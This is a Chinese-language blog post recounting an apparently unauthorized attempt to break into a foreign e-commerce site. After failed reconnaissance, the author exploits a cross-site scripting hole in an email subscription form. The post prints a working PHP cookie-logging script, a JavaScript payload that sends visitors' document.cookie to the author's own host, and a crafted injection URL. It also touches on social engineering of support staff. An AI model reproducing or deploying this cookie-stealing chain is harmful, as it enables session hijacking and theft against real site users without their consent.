0x01目标很难 Seo的pr7啊1999年建立的啊!真xx 瞧这个架势。 使用旁注 c段对我来说都是浮云!
0x02思路 1. google找注入点 探测开发语言 site:xxx.com filetype:jsp site:xxxx.com filetype:pl (aspx \asp \php)
发现上面有pl和jsp Jsp注入?失败 那么久的大站就算有注入点 也不是and 1=1 and 1=2可以测试出来的 或者是xor 1=2 xor 1=4可以找得到的 注入点之路失败 2. 敏感目录穷举法 国外网站目录跟国内区别很多。收录有国内的社工目录。对国外没用。 扫描敏感之路失败 3. 使用渗透软件进行扫描(IBM appscan \burpsuite \JSky\zap\Acunetix) 网站目录和文件太多。软件直接卡死。。(电脑配置不行????) 自动化 漏洞 扫描之路失败 4. Nmap扫描端口 80端口。443端口 失败 5. X-scan扫漏洞 带有最新漏洞脚本库的x-scan有好几百mb看起来挺牛x的但是还是没征服它 漏洞扫描失败(自身对扫描系统漏洞这块也不是很在行) 6. 检测网站程序开源或者自己开发(开源可去oday公布平台找找poc或者exp) 检测得出结果自己开发的程序 Apache http平台 7. 弱口令扫描 我不相信这个能成功。所以它确实没成功! 8. Xss或者csrf 可利用不是非常好,但是也是唯一找到的漏洞了! 9. 强大的社工 Hello!我懂。其他的。。我就不会了! 0x03切入跨站手法
漏洞明细 Ps:注意几点。是邮箱订阅系统。 所以需要有检测@,但是没有检测和过滤其他字符。 所以导致了xss跨站漏洞。 能力有限。不然的话应该,还可以csrf或者是xsrf之类然后扩展wrom
能力有限只能自己写个获取cookies的脚本 使用php语言! Test.php Code: <?php $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = $_SERVER['REMOTE_ADDR'];//远程主机IP地址 $time=date('Y-m-d g:i:s'); //以[年-月-日 时:分:秒]的格式显示时间 $referer = $_SERVER['HTTP_REFERER'];//链接来源 $agent = $_SERVER['HTTP_USER_AGENT']; //用户 浏览器 类型 $fp = fopen('cookie.txt', 'a'); //打开cookie.txt,若不存在则创建它 fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件 fclose($fp); //关闭文件 header("Location: https://www.2cto.com /cgi-bin/storeEmail.pl?email=xsight0@gmail.com"); //将网页重定向,增强隐蔽性 ?>
照顾菜鸟看不懂代码。所以也把代码的意思给写清楚了 Xss.js Code: document.writeln("<script>document.location = \'http:\/\/www.54rk.cn\/test.php?cookie=\' + document.cookie;<\/script>")
构造url: https://www.2cto.com /cgi-bin/storeEmail.pl?email=1@126.com<script%20src="http://www.54rk.cn/xss.js"></script>
黄底要注意。
测试打开
获取成功。
0x04社工强大 主要内容是想请教客服,我对该网站很有兴趣。想订阅该网站内容。是不是这样做。
0x04结尾 不要认为网站排名高。或者pr高的网站就没有漏洞。如果第一步信心你都没做到的话。那么你没必要说什么坚持和努力。也许你连脚本小子都做不到 还有更好的办法。如果谁知道的话请联系我xsight0@gmail.com 下次我请你喝酒! By:xsight0 Blog:www.54rk.cn
查看更多关于对国外电商网站的一次跨站检测 - 网站安全 - 自的详细内容...